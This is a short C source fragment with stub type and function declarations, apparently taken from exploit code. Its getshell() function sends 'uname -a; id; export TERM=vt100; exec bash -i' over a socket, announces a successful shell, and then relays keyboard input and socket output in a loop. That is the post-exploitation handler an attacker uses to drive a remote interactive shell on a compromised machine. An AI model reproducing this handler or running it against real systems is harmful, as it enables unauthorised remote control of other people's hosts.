
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int fd_set ;


 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int STDIN_FILENO ;
 int exit (int ) ;
 int fflush (int ) ;
 int fprintf (int ,char*) ;
 int memset (char*,int,int) ;
 int printf (char*,char*) ;
 int read (int,char*,int) ;
 int select (int,int *,int *,int *,int *) ;
 int send (int,char*,int ,int ) ;
 int stdout ;
 int strlen (char*) ;
 int write (int,char*,int) ;

void getshell(int sock)
{
    int died;
    char *command="uname -a; id; export TERM=vt100; exec bash -i\n";
    char readbuf[1024];
    fd_set rset;

    memset(readbuf,0x00,1024);

    fprintf(stdout," [*] Executed shell successfully !\n\n");
    send(sock,command,strlen(command),0);

    for(;;)
    {
   fflush(stdout);
   FD_ZERO(&rset);
   FD_SET(sock,&rset);
   FD_SET(STDIN_FILENO,&rset);
   select(sock+1,&rset,((void*)0),((void*)0),((void*)0));

   if(FD_ISSET(sock,&rset))
   {
       died=read(sock,readbuf,1024);
       if(died<=0)
       {
      exit(0);
       }
       readbuf[died]=0;
       printf("%s",readbuf);
   }
   if(FD_ISSET(STDIN_FILENO,&rset))
   {
       died=read(STDIN_FILENO,readbuf,1024);
       if(died>0)
       {
      readbuf[died]=0;
      write(sock,readbuf,died);
       }
   }
    }
    return;
}
